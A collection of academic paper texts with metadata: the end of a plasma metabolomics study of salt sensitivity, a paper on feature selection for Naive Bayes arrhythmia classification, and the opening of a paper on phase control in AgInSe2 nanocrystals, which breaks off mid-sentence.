Potential limitations of the current study include: a comparatively small sample size, as the study was conducted in a subset of the salt-sensitive and salt-resistant groups; the possibility of false-positive results despite the use of the Benjamini-Hochberg correction to control the false discovery rate, such that these findings require future validation and replication in additional independent datasets; and, owing to sample normalization without the use of internal standards, our data are qualitative, not quantitative.
In conclusion, our untargeted metabolomic and lipidomic plasma profiling in participants from the DASH-Sodium Trial showed that there was no difference in plasma metabolomic and lipidomic profiles between salt-sensitive and salt-resistant participants at baseline on their regular dietary intake. This outcome does not support our primary hypothesis that salt-sensitive individuals would exhibit altered metabolic and lipidomic profiles. In contrast, our sub-group analysis shows that in salt-sensitive participants, a high-salt intervention was associated with alterations in the levels of tocopherol alpha, 2-ketoisocaproic acid, and citramalic acid, supporting our secondary hypothesis that salt-sensitive participants exhibit an altered metabolomic profile on a high-sodium diet. Further investigations are required to understand the potential physiological significance of these findings and the utility of an association of alterations in these metabolites with the salt sensitivity of BP. | 2021-05-19T06:17:02.353Z | 2021-05-17T00:00:00.000 | {
"year": 2021,
"sha1": "352f3b917de6cbaf62bfc5c85b1051fc76e7f4c3",
"oa_license": "CCBYNCND",
"oa_url": "https://journals.lww.com/jhypertension/Fulltext/2021/10000/An_exploratory_analysis_of_comparative_plasma.6.aspx",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "543448f47be2b24f0f362c61b7f1630579c9d794",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
253558766 | pes2o/s2orc | v3-fos-license | THE IMPACT OF FEATURE SELECTION ON THE PROBABILISTIC MODEL ON ARRHYTHMIA DIAGNOSIS
Arrhythmia is a type of cardiac illness identified by an irregular heart rhythm that can be either too rapid or too slow. An electrocardiograph procedure is required to diagnose arrhythmia; the electrocardiogram (ECG) is the output of this procedure. The ECG is then utilized as a diagnostic tool for arrhythmia. Because ECG data is so extensive, an adequate processing procedure is required. Understanding ECG data can be done in various ways, one of which is classification. Naïve Bayes is a classification technique that can handle enormous amounts of data. ECG data has many features, which makes classification more difficult. Feature selection can be used to eliminate non-essential features from a dataset. This research aimed to determine the impact of feature selection on Naïve Bayes classification. Feature selection increased accuracy, precision, recall, and f-measure by 4%, 0.13, 0.13, and 0.14, respectively, and the computation time was 0.03 seconds faster. The highest performance was obtained by classification with 80 features: the accuracy was 93%, precision and recall were 0.45, the f-measure was 0.42, and the computation time was 0.10 seconds.
Introduction
Arrhythmia is a heart disease characterized by an abnormal heart rhythm that is either too fast or too slow. Arrhythmia cannot be diagnosed by physical examination alone, because some arrhythmia types produce no symptoms the patient can feel. To diagnose an arrhythmia, an electrocardiograph procedure is needed. An electrocardiograph records the heart's electrical activity through leads (electrodes) attached to the patient's chest, arms, and legs, detecting changes in the depolarization and repolarization pattern of each heartbeat. The recording is an electrocardiogram, or ECG, which is then used as a reference for diagnosing an arrhythmia.
To diagnose an arrhythmia, ECG data must be analyzed to determine the patient's actual condition. Analyzing ECG data is not easy: the sheer size of ECG datasets is a hindrance to the analysis process.
Classification is one of the approaches that can be used to analyze ECG data. The analysis results can be used as a reference for diagnosing Arrhythmia based on the result of the ECG. One classification algorithm that is widely used is Naïve Bayes. This algorithm uses probability and statistics based on the Bayes theorem.
This study used the Naïve Bayes algorithm to classify arrhythmia data. The selection of Naïve Bayes is based on several previous studies. Some advantages of Naïve Bayes are that it performs better than several other algorithms [1][2], it does not require extensive data for the training process [3], and it achieves a high level of accuracy and speed when applied to large amounts of data [4]. Therefore, this study used Naïve Bayes as the classification algorithm due to its performance.
A large amount of data contains many features, whether relevant, irrelevant, or redundant. Retaining irrelevant and redundant features confuses the data classification process: it reduces classification speed, increases computational costs and memory usage, and significantly influences the classification result [4][5]. A large number of features can also cause overfitting of the model, decreasing the model's performance. Therefore, a preprocessing stage was needed to select the relevant features.
Feature selection is a technique for selecting relevant features based on specific criteria. It can improve training performance, such as increasing classification accuracy, reducing computational costs, and enabling better model interpretation [6]. Generally, feature selection has three models: wrapper, filter, and embedded. Filter feature selection has several advantages: lower computation time than the other types, simplicity and speed, easy handling of high-dimensional data, and independence from the classification algorithm. One of the filter feature selection algorithms is Information Gain. This algorithm can handle the feature selection process quickly [7] and is more effective at removing features while maintaining excellent accuracy [8]. Due to the advantages described above, the feature selection method used in this study was Information Gain. This study therefore discusses the effect of feature selection on the performance of the Naïve Bayes classification model in diagnosing arrhythmia; the use of feature selection was expected to improve the model's performance.
Electrocardiogram
Electrocardiography is a term used in the cardiovascular field. Electrocardiography is used to examine and diagnose abnormalities in the heart by recording the electrical activity of the heart using leads placed on the chest, arms, and legs to detect changes in the depolarization and repolarization pattern of each heartbeat. The recording result is an electrocardiogram, commonly known as an ECG. The ECG is used to diagnose specific types of heart disease, such as arrhythmias. There are several types of ECG waves, as shown in Figure 1. The P-wave depicts atrial depolarization. The Q-wave marks the beginning of ventricular depolarization. PR is the interval between the start of the P-wave and the start of the QRS complex. The PR segment extends from the end of the P-wave to the beginning of the QRS complex. The QRS complex is the ventricular depolarization time interval. The ST segment describes the interval between ventricular depolarization and repolarization. The T-wave describes ventricular repolarization [1].
Arrhythmia Dataset
The dataset used in this study was the arrhythmia dataset. Arrhythmia is a disorder of abnormal heart rhythm which causes the heart rate to be faster or slower than the usual rhythm. This dataset was downloaded from the Large Dataset, UCI Machine Learning Repository. It contains 279 features and 452 labeled instances.
The arrhythmia dataset had 279 features, comprising the results of ECG interpretation and recorded data from 452 patients. There were 73 features with nominal data types and 206 features with numeric data types. The dataset had 16 classes: a normal class and several classes referring to the arrhythmia types. The first (normal) class contained 245 instances, and the remaining 207 instances were divided among the other classes. Three classes, the 11th, 12th, and 13th, did not appear in the dataset. The class distributions in the dataset are shown in Table 1.
Feature Selection
Feature selection is a technique for selecting relevant features based on specific criteria with minimal loss of information; thus, it can improve training performance, for example by increasing classification accuracy and decreasing computation costs and memory usage [2], and can enable better model interpretation [3]. A large number of features can cause overfitting of the model, which decreases the model's performance. Feature selection can reduce the dimensionality of the features, cut the required storage space, eliminate irrelevant and redundant data and noise, speed up the running time of the learning algorithm, enhance data quality, and improve the accuracy of the resulting model [4].
Filter
The filter approach is separate from the classification process, so feature selection is not affected by the bias of the learning algorithm. The filter technique sorts features based on specific criteria, and the top-ranked features are then used in the classification process. It is a simple and fast technique that easily handles high-dimensional data. Algorithms in the filter category include Relief, Fisher Score, and Information Gain.
Wrapper
Unlike filters, the wrapper technique performs feature selection together with the classification process, using the accuracy estimate of the classification model. This type of feature selection is not recommended for data with a vast number of features. Compared to filter techniques, wrappers have higher computational costs and an increased risk of overfitting.
Embedded
Embedded is a feature selection technique built into the construction of the classifier. It utilizes all features to train the classification model and removes less influential features whose coefficients are close to 0. This technique has better computational costs than the wrapper technique. Decision Trees are an example of the embedded method.
Information Gain
Information Gain (IG) is one of feature selection algorithms in the filter model. IG calculates the gain value of each feature and gives a score based on the gain value, then ranks the scores. The gain value shows how much influence a feature has on data classification. The higher gain value of a feature indicates a more relevant feature.
Information Gain uses the entropy concept to measure the uncertainty of dataset features. The following is the equation for calculating entropy [6]:

Entropy(S) = -Σᵢ pᵢ log₂ pᵢ

where pᵢ is the proportion of samples in S belonging to class i and the sum runs over all classes. The gain of a feature A is then the reduction in entropy obtained by partitioning S on A:

Gain(S, A) = Entropy(S) - Σ_{v ∈ Values(A)} (|Sᵥ| / |S|) · Entropy(Sᵥ)
Classification
Classification is a data analysis method for grouping data into appropriate classes in order to understand the data more efficiently. Classification can be applied to various fields, such as marketing targets, manufacturing, diagnosis in the medical field, etc. Classification has four fundamental components [7]:
1. Class: the dependent categorical variable that represents the label produced by the classification, such as customer loyalty, earthquake type, etc.
2. Predictors: the data characteristics or attributes, such as blood pressure, season, marital status, wind speed and direction, etc.
3. Training dataset: a data set containing both class labels and predictors, used to train the model to recognize the appropriate class based on the available predictors.
4. Testing dataset: new data to be classified by the model that has been constructed.
The data classification process involves constructing a model (learning step) and applying the model (classification step) [6]. In the learning phase, the model is built from data with complete information, i.e., both features and class labels; the training data is analyzed by the classification algorithm. In the classification stage, the model is used to determine the class of the testing data, and the accuracy of the classification algorithm is calculated as the percentage of testing data the model classifies correctly.
Several things that are used as considerations in choosing a method in classification model are accuracy rate of the model in classifying data, speed in processing data, the reliability when it faces noises in the data, easy-to-understand model interpretation, and the simplicity of the model [7]. Some classification algorithms frequently used are Decision Tree, Naïve Bayes, Neural Network, K-nearest Neighbor, etc.
Naïve Bayes
One of the most widely used classification algorithms is Naïve Bayes. It predicts class probabilities based on prior observations, using probability and statistical methods following the Bayes theorem. Compared to other algorithms, Naïve Bayes is easy to use, has a low error rate and high accuracy, and is fast when applied to extensive data because it does not require complex iterative parameter estimation [6]. With its naïve independence assumption, Naïve Bayes reduces computation time by simply multiplying probabilities. Because of this simplicity, Naïve Bayes can handle datasets with many features.
Bayes' theorem states that the probability that a sample with particular characteristics belongs to class C (the posterior probability) is the probability of class C (the prior) multiplied by the probability of the sample characteristics given class C (the likelihood), divided by the global probability of the sample characteristics (the evidence). Below is the Bayes theorem equation:

P(C|X) = P(X|C) P(C) / P(X)

where:
X : data with an unknown class
C : the class hypothesis
P(C|X) : probability of hypothesis C given X (posterior probability)
P(C) : probability of hypothesis C (prior probability)
P(X|C) : probability of X given hypothesis C (likelihood)
P(X) : probability of X (evidence)

For classification with continuous data, the Gaussian density (normal distribution) formula is used:

P(X = x | C) = (1 / (σ_C √(2π))) exp(-(x - μ_C)² / (2 σ_C²))

where μ_C and σ_C are the mean and standard deviation of the feature in class C.
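To make the construction above concrete, here is a minimal from-scratch Python sketch of a Gaussian Naïve Bayes classifier following the paper's description (per-class priors plus per-class feature means and standard deviations). It is illustrative only, not the authors' code; the class name and the small variance floor are our choices:

```python
import numpy as np

class GaussianNaiveBayes:
    """Minimal Gaussian Naive Bayes: priors, per-class feature means/stds."""

    def fit(self, X, y):
        self.classes_ = np.unique(y)
        self.priors_ = np.array([(y == c).mean() for c in self.classes_])
        self.mu_ = np.array([X[y == c].mean(axis=0) for c in self.classes_])
        # Small floor avoids division by zero for near-constant features
        self.sigma_ = np.array([X[y == c].std(axis=0) + 1e-9 for c in self.classes_])
        return self

    def predict(self, X):
        # log posterior ∝ log prior + sum of log Gaussian likelihoods per feature
        log_post = []
        for p, mu, sg in zip(self.priors_, self.mu_, self.sigma_):
            ll = -0.5 * np.log(2 * np.pi * sg**2) - (X - mu) ** 2 / (2 * sg**2)
            log_post.append(np.log(p) + ll.sum(axis=1))
        return self.classes_[np.argmax(np.stack(log_post, axis=1), axis=1)]
```

Working in log space avoids numerical underflow when multiplying many small likelihoods across 261 features.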
K-fold Cross-Validation
Cross-Validation is a technique used to assess the performance of a model or algorithm by partitioning the data into training data and testing data. K-fold Cross-Validation is one Cross-Validation method: the data is divided into K partitions, (K-1) partitions are used as training data, and the remaining partition is used as testing data. The Cross-Validation process is then repeated K times with a different test partition each time [6].
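As an illustration of the K-fold scheme used later in the evaluation (the paper does not specify an implementation; this sketch uses scikit-learn, and the function name is ours):

```python
import numpy as np
from sklearn.model_selection import KFold

def kfold_accuracy(model, X, y, k=5, seed=0):
    """Average accuracy over k folds; each fold serves once as the test set."""
    accs = []
    for train_idx, test_idx in KFold(n_splits=k, shuffle=True, random_state=seed).split(X):
        model.fit(X[train_idx], y[train_idx])
        accs.append((model.predict(X[test_idx]) == y[test_idx]).mean())
    return np.mean(accs)
```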
Classification Evaluation
To determine the performance of a classification model, a classification evaluation process is necessary. The evaluation method used in this study was the Confusion Matrix as a measure of accuracy [7]. Table 2 describes the Confusion Matrix model. Evaluation using the Confusion Matrix produces accuracy, precision, recall, and f-measure values. The Confusion Matrix contains the cases that are correctly classified and those that are not.
Precision is the proportion of cases predicted as positive that are truly positive in the actual data. In other words, precision measures exactness: the number of relevant items selected divided by the total number of items selected. Using the confusion matrix:

Precision = TP / (TP + FP)

Recall is the proportion of actual positive cases that are correctly predicted as positive. In other words, recall measures completeness: the number of relevant items selected divided by the total number of relevant items available:

Recall = TP / (TP + FN)

F-measure is used to evaluate classification performance as a combination of precision and recall:

F-measure = (2 × Precision × Recall) / (Precision + Recall)

where:
TP (True Positive) : positive prediction by the system that matches the actual state
TN (True Negative) : negative prediction by the system that matches the actual state
FP (False Positive) : positive prediction by the system that does not match the actual state
FN (False Negative) : negative prediction by the system that does not match the actual state
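The metrics above translate directly into code; a minimal sketch for the binary case (for its 16-class problem, the paper averages such per-class values), with the function name being ours:

```python
def classification_metrics(tp, tn, fp, fn):
    """Confusion-matrix metrics from the equations above (binary case sketch)."""
    accuracy = (tp + tn) / (tp + tn + fp + fn)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f_measure = (2 * precision * recall / (precision + recall)
                 if precision + recall else 0.0)
    return accuracy, precision, recall, f_measure
```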
Research Methodology
The system constructed in this study was a classification system using the Naïve Bayes method. The dataset used was the arrhythmia diagnosis data, with no missing values and ready to use. In this system, a feature selection process was used to determine the effect of applying feature selection on the performance of the Naïve Bayes classification. Several experimental scenarios were carried out to determine this impact: classification with and without feature selection under several different conditions. An evaluation was carried out using the Confusion Matrix. The system design is shown in Figure 2 below.
Input Dataset
The input was the arrhythmia dataset: diagnostic data based on patients' heart activity, downloaded from the Large Dataset, UCI Machine Learning Repository. It consisted of 452 records with 279 features, such as the patient's age, gender, weight and height, heart rate, and other patient data.
Data cleaning was performed by filling the missing values of the features P, T, QRST, and Heart with the average value of each feature. The feature J was omitted because it had many missing values. Data cleaning also eliminated 17 features that held only a single value, as they had no variation. Therefore, 452 records with 261 features were used in this study.
Feature Selection
The input data goes through the feature selection process using the Information Gain (IG) method. In this step, the gain value of each feature is calculated and ranked; the greater a feature's gain value, the more relevant the feature is to the classification process. The result of this feature selection process is the set of relevant features to be used in the classification process.
Classification
The next step is constructing a classification model using the Naïve Bayes method with a Gaussian distribution. The construction of the model starts by calculating the prior of each class and the mean and standard deviation of each feature in each class. The mean and standard deviation are used to calculate the likelihood of each feature. From the prior and likelihood values, the posterior is computed and used as the classification criterion.
Testing and Evaluation
To measure the method's performance, tests were carried out with the following scenarios:
1. 1st scenario: the Naïve Bayes classification test was conducted with no feature selection.
2. 2nd scenario: the Naïve Bayes classification test with Information Gain feature selection, applied with several feature-ranking limits (n = 40, 80, 120, 160, 200, 240).
Each test above produced accuracy, precision, recall, f-measure, and computation time values to assess the performance of the Naïve Bayes classification model.
The evaluation phase was performed using K-fold Cross-Validation with k = 5 in each testing scenario. To determine the performance of the classification model, calculations of accuracy, precision, recall, and f-measure were performed using the Confusion Matrix and the ROC (Receiver Operating Characteristic) curve. The performance of the two testing scenarios was then compared to find the best scenario.
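The two scenarios can be sketched in a few lines of Python. This sketch is illustrative only: the paper does not state its implementation, and scikit-learn's mutual_info_classif is closely related to, but not identical with, the Information Gain ranking described above; all function names here are ours:

```python
from sklearn.feature_selection import SelectKBest, mutual_info_classif
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import cross_val_score

def run_scenario(X, y, n_features=None, k=5):
    """Scenario 1 (n_features=None): Gaussian Naive Bayes on all features.
    Scenario 2: keep the n top-ranked features first, then classify.
    Returns mean accuracy under k-fold cross-validation."""
    if n_features is not None:
        X = SelectKBest(mutual_info_classif, k=n_features).fit_transform(X, y)
    return cross_val_score(GaussianNB(), X, y, cv=k, scoring="accuracy").mean()

# e.g., compare scenario 1 with scenario 2 at the paper's ranking limits:
# for n in (None, 40, 80, 120, 160, 200, 240):
#     print(n, run_scenario(X, y, n))
```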
Finding and Discussion
As explained earlier, the tests were carried out with two scenarios: classification without feature selection and with feature selection. The goal was to find the better procedure of the two. Tables 3 and 4 show the results of implementing the first and second testing scenarios. In the second testing scenario, six experiments were conducted by applying the Naïve Bayes classification model with feature selection using different numbers of features: 40, 80, 120, 160, 200, and 240. From this series of experiments, the average accuracy was 90%, while the average precision, recall, and f-measure were 0.33, 0.35, and 0.30, respectively. The experiments took an average of 0.11 seconds.
A series of experiments in the second testing scenario produced a comparison graph of the accuracy rate, as shown in Figure 3.
Figure 3. Comparison of Accuracy of 2 nd Testing Scenario
As shown in Figure 3, the accuracy rates of the 2nd testing scenario series with 40, 80, 120, 160, 200, and 240 features were 91%, 93%, 93%, 92%, 87%, and 86%, respectively. The highest accuracy (93%) was obtained in the experiments with 80 and 120 features, while the lowest (86%) was obtained in the experiment with 240 features. Figure 4 shows a comparison of the precision, recall, and f-measure values across the 2nd testing scenario series. The graph in Figure 4 clearly shows that the experiment with 80 features had the highest precision, recall, and f-measure of all the experiments: precision and recall were 0.45, and the f-measure was 0.42.
In contrast, the experiment with 240 features had the lowest precision, recall, and f-measure of all the experiments: 0.21, 0.25, and 0.17, respectively. In general, the computation time increased linearly; the more features used, the longer the classification process took. Table 4.3 compares the experimental results of the 1st and 2nd scenarios. The 2nd scenario's result is the average of the six experiments using feature selection with different numbers of features.
The average accuracy in the second scenario was 4% higher than in the first scenario, as shown in Figure 6. Figure 8 shows clearly that precision, recall, and f-measure increased significantly in the second scenario compared with the first: precision increased by 0.13, recall by 0.13, and f-measure by 0.14. Overall, Table 4.3 and Figure 8 show that the 2nd scenario's results were better than the 1st scenario's. According to the experimental results above, implementing feature selection increased the accuracy, precision, recall, and f-measure, and the computation time needed for the classification process also decreased. Overall, feature selection improved the performance of the Naïve Bayes classification model.
Conclusion
From the results of the two scenarios carried out in this study, it can be concluded that feature selection influenced the performance of the Naïve Bayes classification model on arrhythmia diagnosis. Implementing feature selection increased the accuracy rate by 4%, precision by 0.13, recall by 0.13, and f-measure by 0.14, while the computation time was 0.03 seconds faster. The highest performance was obtained by classification with 80 features: the accuracy was 93%, precision and recall were 0.45, the f-measure was 0.42, and the computation time was 0.10 seconds. | 2022-11-17T16:07:23.507Z | 2022-07-31T00:00:00.000 | {
"year": 2022,
"sha1": "654446035eed9472f03515e3ef3ca032ff155df3",
"oa_license": "CCBYSA",
"oa_url": "https://journal.trunojoyo.ac.id/ijseit/article/download/15265/pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "3275a3856aabbb16e5c91a928e1a229972e3c50a",
"s2fieldsofstudy": [
"Medicine",
"Computer Science"
],
"extfieldsofstudy": []
} |
209380414 | pes2o/s2orc | v3-fos-license | Ligand-Mediated Phase Control in Colloidal AgInSe2 Nanocrystals
Synthetic studies of colloidal nanoparticles that crystallize in metastable structures represent an emerging area of interest in the development of novel functional materials, as metastable nanomaterials may exhibit unique properties when compared to their counterparts that crystallize in thermodynamically preferred structures. Herein, we demonstrate how phase control of colloidal AgInSe2 nanocrystals can be achieved by performing reactions in the presence, or absence, of 1-dodecanethiol. The thiol plays a crucial role in the formation of metastable AgInSe2 nanocrystals, as it mediates an in-situ topotactic cation exchange from an orthorhombic Ag2Se intermediate to a metastable orthorhombic phase of AgInSe2. We provide a detailed mechanistic description of this cation exchange process to structurally elucidate how the orthorhombic phase of AgInSe2 forms. Density functional theory calculations suggest that the orthorhombic phase of AgInSe2 is metastable by a small margin, at 10 meV/atom above the thermodynamic ground state. In the absence of 1-dodecanethiol, a mixture of Ag2Se nanocrystal intermediates forms that converts through kinetically slow, non-topotactic exchange processes to yield the thermodynamically preferred chalcopyrite structure of AgInSe2. Finally, we offer new insight into the prediction of novel metastable multinary nanocrystal phases that do not exist on bulk phase diagrams.
Metastability, broadly defined, is the kinetic persistence of a system that exists in a higher free energy state than the thermodynamically most stable state for a given set of conditions. The applications of metastable materials are ubiquitous, and include examples from diamond wafers for semiconductor applications to the use of technetium-99m as a radiotracer in gamma ray imaging [1,2]. All nanomaterials are inherently metastable with respect to their bulk material counterparts as a result of their high surface energies and large surface area-to-volume ratios [3,4]. In addition to the useful properties afforded by size effects for colloidal nanocrystal analogs of thermodynamically stable bulk materials of that same crystal phase, the thermodynamic scales of phase equilibria on the nanoscale are often compressed, allowing relatively low-temperature syntheses of crystalline polymorphs that only exist at much higher temperatures and/or pressures in the bulk [5][6][7][8]. Furthermore, entirely new crystal phases can arise on the nanoscale that have no known counterparts in bulk [9][10][11][12][13]. Because the physical properties of a material are linked to its crystalline structure, the ability to isolate new or difficult-to-access metastable structures on the nanoscale holds promise for the discovery of novel functional materials with properties different from, and possibly superior to, the properties of more thermodynamically stable materials [14][15][16][17][18]. To synthetically target such materials, it is important to consider that a metastable state is only isolable if, under some set of conditions, that state represents a thermodynamic minimum [5]. In other words, if a state is never the thermodynamically most stable state under any set of conditions, it is not synthesizable.
The synthetic chemistry of colloidal nanocrystals that persist in metastable states with respect to their bulk analogs remains a science largely dependent on empirical findings rather than on bottom-up design principles. This is partially a result of the myriad variables that can contribute to phase determination, such as nanocrystal size, 8 surface area-to-volume ratio, 19 surface functionalization, 14 crystal defects, 9 etc. These confounding variables make it difficult to draw direct analogies between the thermodynamic phase diagrams of bulk materials and the corresponding stabilities at the nanoscale, [20][21][22] thus making the predictable synthesis of metastable colloidal nanocrystals an outstanding challenge. 23 Diorganyl dichalcogenides (R-E-E-R, where E = S, Se, or Te, and R = Ph, Me, Bz, etc.) are proven molecular precursors for the preparation of colloidal metal chalcogenide nanocrystals and, in particular, for the preparation of metastable phases of these nanocrystals, including wurtzite or wurtzite-like phases of CuInS2, Cu2SnSe3, Cu2ZnSnS4, and Cu2-xSe. [24][25][26][27] We were the first to report a previously unknown wurtzite-like phase of CuInSe2 from a synthesis utilizing a diselenide precursor, which was shown to be critical in the phase determination of the resulting nanocrystals. We subsequently determined that the functional groups on the diselenide precursor could be leveraged to molecularly program different polymorphs of the resulting colloidal CuInSe2 nanocrystals depending on the C-Se precursor bond strength. 24 Herein, we explore a related ternary chalcogenide, AgInSe2, which is of interest for applications in near-infrared luminescence and as a solar absorber for thin-film photovoltaics. [28][29][30][31][32][33] Like CuInSe2, AgInSe2 belongs to the family of I-III-VI2 semiconductors that adopt a thermodynamically preferred chalcopyrite structure in bulk. Possessing an A+B3+(E2−)2 composition, the diamondoid structure of chalcopyrite can be thought of as a supercell of zinc blende in which the A+ and B3+ cations are ordered in the cation sub-lattice and the Se2− sub-lattice adopts a cubic close-packed structure. In the case of AgInSe2, a metastable orthorhombic phase is also known that exists only on the nanoscale, in which the Se2− sub-lattice adopts a hexagonally close-packed structure. This metastable phase of AgInSe2 is isostructural with the high-temperature orthorhombic phase of bulk AgInS2, with the In3+ and Ag+ cations ordered so that they alternate along the [001] crystallographic direction. 34 While dichalcogenides have been utilized to access a wide range of metastable colloidal nanocrystal phases, as mentioned above, it has also been observed that the presence or absence of coordinating ligands influences phase determination in these reactions. 14,[35][36][37] Herein, we elucidate the role of a coordinating ligand in the phase determination of AgInSe2 nanocrystals synthesized using dibenzyl diselenide as the selenium precursor. The resulting formation mechanism is notably different from previously proposed mechanisms for the formation of metastable orthorhombic AgInSe2 nanocrystals. [38][39][40] Finally, we propose a general conceptual framework that explains the isolation of previously empirically discovered metastable polymorphs on the nanoscale and may aid in future rational discoveries of metastable materials that do not exist on bulk phase diagrams.
RESULTS AND DISCUSSION
In a typical reaction, AgNO3 and In(OAc)3 were dissolved together in a mixture of 1-octadecene (ODE), 1-dodecanethiol (DDT), and oleic acid. In a separate flask, the dibenzyl diselenide (Bn2Se2) selenium source was dissolved in DDT and ODE. The metal precursor solution was then heated, and the solution containing the diselenide was hot-injected into the metal precursors at 200 °C. Under these reaction conditions, we observed the formation of colloidally stable, 10-nm AgInSe2 nanocrystals that crystallize in the orthorhombic Pna21 space group, a metastable phase of AgInSe2 known to form only on the nanoscale (Figure 1). 34,41 The powder X-ray diffraction (XRD) pattern of the phase-pure orthorhombic nanocrystals is given in Figure 1a. Rietveld refinement of the XRD pattern using the Pna21 space group returns lattice parameters of a = 7.3151(2), b = 8.5366(3), and c = 6.9638(1) Å, with a unit cell volume of V = 434.86(1) Å3. These values are in close agreement with previously reported experimental values for orthorhombic AgInSe2 (i.e., a = 7.33 Å, b = 8.52 Å, and c = 7.02 Å; V = 438 Å3). 39 This orthorhombic phase is similar to the wurtzite structure type, with the notable distinction between them being the ordering of Ag+ and In3+ in the orthorhombic structure. Discerning wurtzite from wurtzite-like structures can be difficult and has been a point of interest within studies of metastable ternary chalcogenide materials. 15,33,42 In this case, orthorhombic AgInSe2 in the Pna21 space group exhibits distinct low-angle reflections (at 15-16° 2θ) from the (110) and (011) lattice plane families, which are absent in the higher-symmetry wurtzite structure type (space group P63mc; see Figure S1). The Rietveld refinement and the observation of low-angle reflections in Figure S1 lead us to conclude that the metastable AgInSe2 nanocrystals do indeed assume a wurtzite-like structure that maintains Ag+ and In3+ ordering within the crystalline lattice.
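As a quick arithmetic check on the refinement, the cell volume of an orthorhombic lattice is simply the product of its lattice parameters (V = abc). A minimal Python sketch using the refined values quoted above:

```python
# Orthorhombic cell volume check, V = a*b*c, with the Rietveld-refined
# lattice parameters for Pna21 AgInSe2 quoted in the text.
a, b, c = 7.3151, 8.5366, 6.9638  # Angstroms
V = a * b * c
print(f"V = {V:.2f} A^3")  # -> V = 434.86 A^3, matching the reported 434.86(1) A^3
```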
The diselenide precursor is important for phase determination. When Bn2Se2 is replaced with grey selenium in the same solvent mixture, the reaction does not yield a product, owing to the low solubility and reactivity of Se powder under these reaction conditions. However, when Se powder is dissolved in oleylamine and used as the selenium source under otherwise similar conditions, the reaction gives chalcopyrite AgInSe2 nanocrystals. 28 Nonetheless, formation of the metastable orthorhombic phase of AgInSe2 using Bn2Se2 was a surprising result, as it differs from what we observed when employing Bn2Se2 in the synthesis of CuInSe2 nanocrystals; there, diselenide precursors possessing relatively weak C-Se bonds, including Bn2Se2, gave the thermodynamically preferred chalcopyrite phase of CuInSe2. 24 Thus, we anticipated that Bn2Se2 might similarly produce the thermodynamically preferred chalcopyrite phase of AgInSe2, yet this turned out not to be the case. This indicates that the mechanism of formation of this metastable phase when using Bn2Se2 is distinct from that previously observed for the formation of CuInSe2.
Although Bn2Se2 leads to the metastable orthorhombic phase of AgInSe2, we surmised that increasing the reaction temperature might yield the thermodynamically preferred phase of AgInSe2. The initial reactions with Bn2Se2 that gave orthorhombic AgInSe2 nanocrystals were performed at 220 °C. Increasing the reaction temperature to 250 °C still resulted in the formation of metastable orthorhombic AgInSe2, with no indication of chalcopyrite formation by XRD (Figure 1a). Annealing powders of the metastable AgInSe2 nanocrystals at 300 °C in the solid state also does not cause the material to thermally relax to the chalcopyrite phase, even after several heating/cooling cycles (Figures S2 and S3). Moreover, after leaving the as-prepared orthorhombic AgInSe2 nanocrystals for ~10 months on the lab bench under ambient conditions, they maintain their metastable orthorhombic structure (Figure S2). Heating the as-synthesized orthorhombic AgInSe2 nanocrystals at 300 °C for 1 h as a colloidal suspension in ODE also leaves the metastable phase mostly intact, although some conversion to the chalcopyrite phase was observed, indicating that this metastable phase is more resistant to relaxation as a powder at high temperatures than as a colloid in solution (Figure S2). Empirically, the orthorhombic phase of these AgInSe2 nanocrystals appears to be a local minimum in the energetic landscape of this material system with a high barrier to reorganization to the thermodynamically preferred phase, and thus the orthorhombic phase remains kinetically persistent.
To explore the potential roles of the coordinating species (i.e., DDT and oleic acid) in phase determination, they were systematically omitted from the reactions. When oleic acid is omitted from the reaction by replacing it with an equal volume of DDT, under otherwise identical conditions, the reaction still returns orthorhombic AgInSe2 (Figure S4). This suggests that oleic acid does not play a major role in phase determination. Conversely, when DDT is replaced by an equal volume of oleic acid, we found that the analogous hot-injection reaction with Bn2Se2 performed at 250 °C yields chalcopyrite AgInSe2 with minor Ag2Se impurities (Figure S4). This result illustrates that (1) Bn2Se2 can give the thermodynamic phase under certain reaction conditions and (2) DDT plays a critical role in phase determination in this reaction.
Formation of Chalcopyrite AgInSe2.
To probe the formation of chalcopyrite AgInSe2, a study was performed without DDT in which aliquots were removed at certain time points after the injection of Bn2Se2. Powder XRD patterns of the nanocrystal products isolated from each aliquot show a complex mixture of Ag2Se intermediates at early times that, over the span of 15 min, convert into chalcopyrite AgInSe2 upon reaction with In3+ in solution (Figure 2a). Bulk Ag2Se exhibits two stable polymorphs: a low-temperature orthorhombic phase and a high-temperature (T > 130 °C) cubic phase. 9,43 However, an additional metastable tetragonal polymorph is known to form within polycrystalline thin films and for Ag2Se nanocrystals. [9][10][11][12][13] To the best of our knowledge, the crystal structure of this tetragonal phase of Ag2Se has not yet been unambiguously determined, in large part due to its instability as a bulk material under any known conditions. Even so, Wang et al. conducted a thorough investigation of the phase transitions that occur between the tetragonal, orthorhombic, and cubic phases of Ag2Se nanocrystals by variable-temperature powder XRD measurements. 9 For their system, they reported that the tetragonal phase undergoes a phase transition to the cubic phase at ~110 °C, whereas the low-temperature orthorhombic phase converts to the cubic phase at ~140 °C. Figure 2a illustrates that 1 min after injecting Bn2Se2 into the metal precursor solution in the absence of DDT, all three distinct polymorphs of Ag2Se are present (i.e., the orthorhombic, tetragonal, and cubic structures). Phase quantification of each respective polymorph is difficult due to the high degree of overlap among the powder XRD patterns of these three phases. Both the orthorhombic and tetragonal phases of Ag2Se are likely metastable at the reaction temperature of the aliquot study, and both are capable of undergoing direct phase transitions to cubic Ag2Se at elevated temperatures, which led us to suspect that the cubic phase of Ag2Se might be the binary intermediate that ultimately gives rise to chalcopyrite AgInSe2. However, a control experiment in which Bn2Se2 was hot-injected into a flask containing only AgNO3 (i.e., with no In(OAc)3 precursor) revealed that these Ag2Se phases do not undergo phase transitions to cubic Ag2Se after 30 min (Figure S5) under the same conditions used for the aliquot study shown in Figure 2a, suggesting that each of the intermediate Ag2Se phases must be capable of directly converting to chalcopyrite AgInSe2 in the presence of In3+ cations.
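Given the heavy overlap among the Ag2Se powder patterns noted above, phase assignment in aliquot studies leans on simulated reference patterns for each polymorph. The sketch below shows one way to generate such references with pymatgen; the use of pymatgen and the local CIF file names are assumptions made for illustration, not the workflow actually used in this study.

```python
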